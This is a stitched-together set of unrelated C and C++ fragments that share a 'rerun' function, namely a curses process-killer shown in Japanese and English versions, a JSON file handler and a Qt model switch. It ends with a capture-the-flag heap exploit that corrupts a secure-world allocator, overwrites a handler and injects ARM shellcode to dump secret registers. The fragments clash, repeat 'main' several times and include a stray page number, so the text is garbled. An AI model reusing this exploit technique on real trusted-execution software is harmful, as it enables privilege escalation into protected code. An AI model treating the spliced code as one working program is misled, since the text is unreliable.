main()
{
char c;
// ウィンドウを準備する。以下の3行でcursesライブラリを呼び出す
// cursesプログラムの標準的な初期化手順である
scrn = initscr();
noecho(); // キー入力をエコーしない
cbreak(); // キー入力は即時有効になる。Enterキー入力を必要としない
// 'ps ax' を実行し出力を処理する
runpsax();
// ウィンドウに表示する
showlastpart();
// ユーザコマンドループ
while (1) {
// ユーザコマンドを受け取る
c = getch();
if (c == 'u') updown(-1);
else if (c == 'd') updown(1);
else if (c == 'r') rerun();
else if (c == 'k') prockill();
else break; // 終了する
}
// 元の設定を復元する
endwin();
}
//////////////////////////////////////////////////////
// This is the initial run, All it does now is call
// rerun since that is what an initial run is, a rerun
// of all the code
//////////////////////////////////////////////////////
cluster* initialrun(Queue *q, tree_t* tree)
{
cluster* root;
root = rerun(q,tree,1);
return(root);
}
// ハイライト中のプロセスを kill する
prockill()
{
char *pid;
// strtok() はCのライブラリ関数(詳細はmanを参照)
pid = strtok(cmdoutlines[cmdstartrow+winrow]," ");
kill(atoi(pid),9); // シグナル9(SIGKILL;強制終了)をプロセスに
// 送るためのUnixシステムコール
rerun();
}
int main()
{ char c;
// window setup, next 3 lines are curses library calls, a standard
// initializing sequence for curses programs
scrn = initscr();
noecho(); // don’t echo keystrokes
cbreak(); // keyboard input valid immediately, not after hit Enter
// run ’ps ax’ and process the output
runpsax();
// display in the window
showlastpart();
// user command loop
while (1) {
// get user command
c = getch();
if (c == ’u’) updown(-1);
else if (c == ’d’) updown(1);
6
else if (c == ’r’) rerun();
else if (c == ’k’) prockill();
else break; // quit
}
// restore original settings and leave
endwin();
return 0;
}
int
main (int argc, char **argv)
{
FILE *f;
char *infile, *outfile, buf[1000], jsonstr[10000];
struct json *inp_json, *outp_json;
if (argc != 2)
usage ();
infile = argv[1];
if ((f = fopen (infile, "r")) == NULL) {
fprintf (stderr, "error opening file\n");
return (1);
}
memset (&jsonstr, 0, sizeof jsonstr);
while (fgets (buf, sizeof buf, f) != NULL) {
sprintf (jsonstr, "%s%s", jsonstr, buf);
}
inp_json = json_decode (jsonstr);
fclose (f);
outp_json = json_dup (inp_json);
if (strcmp (json_objref_str (inp_json, "first"), "1") == 0) {
init (outp_json);
} else {
alert ();
rerun (outp_json);
}
outfile = json_objref_str (inp_json, "outfile");
if ((f = fopen (outfile, "w")) == NULL) {
fprintf (stderr, "error opening %s for writing: %m\n", outfile);
return (1);
}
char *newjson;
newjson = json_encode (outp_json);
fwrite (newjson, 1, strlen (newjson), f);
fwrite ("\n", 1, 1, f);
fclose (f);
return (0);
}
void prockill()
{ char *pid;
// strtok() is from C library; see man page
pid = strtok(cmdoutlines[cmdstartrow+winrow]," ");
kill(atoi(pid),9); // this is a Unix system call to send signal 9,
// the kill signal, to the given process
rerun();
}
QVariant TestItem::data(int role) const
{
switch(role) {
case DurationRole:
return duration();
case ChecksumRole:
return checksum();
case DependsRole:
return depends();
case TestNameRole:
return testname();
case RequiresRole:
return requires();
case DescriptionRole:
return description();
case CommandRole:
return command();
case EnvironRole:
return environ();
case PluginRole:
return plugin();
case TypeRole:
return type();
case UserRole:
return user();
case ViaRole:
return via();
case GroupRole:
return group();
case CheckRole:
return check();
case ObjectPathRole:
return objectpath();
case RunstatusRole:
return runstatus();
case ElapsedtimeRole:
return elapsedtime();
case GroupstatusRole:
return groupstatus();
case ParentNameRole:
break;
case ParentIdRole:
break;
case DepthRole:
return depth();
case BranchRole:
return branch();
case RerunRole:
return rerun();
default:
return QVariant();
}
// Prevents non-void return warning from the compiler
return QVariant();
}
int main() {
char mybuf[100];
TCI *tci = *(TCI **)(0x412770); // only works with the registerd TCI buf!
tci->data[0] = 0x41;
tci->data[1] = 0x41;
tci->data[2] = 0x41;
tci->data[3] = 0x41;
tci->data[4] = 0x41;
tci->data[5] = 0x41;
tci->data[6] = 0x41;
tci->data[7] = 0x41;
// Malloc some stuff
for(int i = 0; i < 4; i++) {
do_tci_save(tci, i, 8);
}
// free something
do_tci_save(tci, 2, 64);
{
static const char fmt[] __attribute__ ((section (".text"))) = " phase 2\n\x00\x00\x00\x00\x00";
printf(&fmt[0]);
}
//
// Get a too-large item into the place we allocated the first thing,
// overwriting the free node for the thing above.
//
//
// The "0x4700300c" below is
// 300d adds r0, #13
// 4700 bx r0
//
// After some of the do_tci_save operations below, those executable
// bytes end up clobbering the text section near 0x122C, which is
// the do_tci_load handler, and at a point in time where our shared
// buffer is inside r0.
//
for(int i = 0; i < 500; i++) {
// This loop just spams the address we wanted to write at, and the value
// we wanted written there. I failed to get a "precise" version of this
// heap exploit working, but effectively what's happening is that the
// "0x122C - 8" and "0x4700300c" are overwriting some "previous free block"
// and "next free block" pointers (I forget which order -_-), and the
// malloc/free activity later causes list-insertion like behavior that
// essentially runs *0x122C = 0x4700300c
((unsigned*)&tci->data)[i] = !(i%2) ? 0x122C - 8 : 0x4700300c;
}
// Trigger the malloc bug, and the copy of our spam above.
do_tci_save(tci, 0, 0xFFFFFFF3);
for(int i = 0; i < 2; i++) {
static const char fmt[] __attribute__ ((section (".text"))) = " phase 3\n\x00\x00\x00\x00\x00";
printf(&fmt[0]);
}
//
// This is the shellcode payload that executes *in* s-el0.
// (as opposed to this C code itself, which is a shellcode payload
// that executes in el0).
//
// This shellcode actually overwrites itself with the flag; this is
// because this shellcode lives within the shared page between
// EL0 and S-EL0. From EL0, we send the shellcode, and then read it
// back out to find the flag there.
//
// Code to load flag-containing registers and write them to [r0].
// add r0, r0, #0
// add r0, r0, #0
// add r0, r0, #0
// add r0, r0, #0
// add r0, r0, #0
// add r0, r0, #0
// mrc p15, 3, r1, c15, c12, 0
// str r1, [r0, #12]
// mrc p15, 3, r1, c15, c12, 1
// str r1, [r0, #16]
// mrc p15, 3, r1, c15, c12, 2
// str r1, [r0, #20]
// mrc p15, 3, r1, c15, c12, 3
// str r1, [r0, #24]
// mrc p15, 3, r1, c15, c12, 4
// str r1, [r0, #28]
// mrc p15, 3, r1, c15, c12, 5
// str r1, [r0, #32]
// mrc p15, 3, r1, c15, c12, 6
// str r1, [r0, #36]
// mrc p15, 3, r1, c15, c12, 7
// str r1, [r0, #40]
// MOVS R0, #0
// str r0, [r0] // intentional segfault, it's a fine way to exit here.
// svc 0
static const char dat[] __attribute__ ((section (".text"))) = {0,0,0,
0x00,0x00,0x80,0xe2,0x00,0x00,0x80,0xe2,0x00,0x00,0x80,0xe2,0x00,0x00,0x80,0xe2,0x00,0x00,0x80,0xe2,0x00,0x00,0x80,0xe2,0x00,0x00,0x80,0xe2,0x00,0x00,0x80,0xe2,0x00,0x00,0x80,0xe2,0x00,0x00,0x80,0xe2,0x1c,0x1f,0x7f,0xee,0x0c,0x10,0x80,0xe5,0x3c,0x1f,0x7f,0xee,0x10,0x10,0x80,0xe5,0x5c,0x1f,0x7f,0xee,0x14,0x10,0x80,0xe5,0x7c,0x1f,0x7f,0xee,0x18,0x10,0x80,0xe5,0x9c,0x1f,0x7f,0xee,0x1c,0x10,0x80,0xe5,0xbc,0x1f,0x7f,0xee,0x20,0x10,0x80,0xe5,0xdc,0x1f,0x7f,0xee,0x24,0x10,0x80,0xe5,0xfc,0x1f,0x7f,0xee,0x28,0x10,0x80,0xe5,0x00,0x00,0xb0,0xe3,0x00,0x00,0x80,0xe5,0x00,0x00,0x00,0xef,
0x00};
for(int i = 0; i < sizeof(dat); i++)
tci->data[i] = dat[i]; // Note: I don't think this loop mattered, just ignore it.
do_tci_save(tci, 6, sizeof(dat)); // Trigger the free() & malloc() that writes 0x4700300c to the do_tci_load handler.
// Copy our shellcode into the shared buffer.
for(int i = 0; i < sizeof(dat); i++)
tci->data[i] = dat[i];
// The S-EL0 load handler has been overwritten with something
// that jumps to our shellcode in the shared buffer.
do_tci_load(tci, 0, 0);
// Our code inside do_tci_load hex-dumps the flag (among other junk data).
return rerun();
}
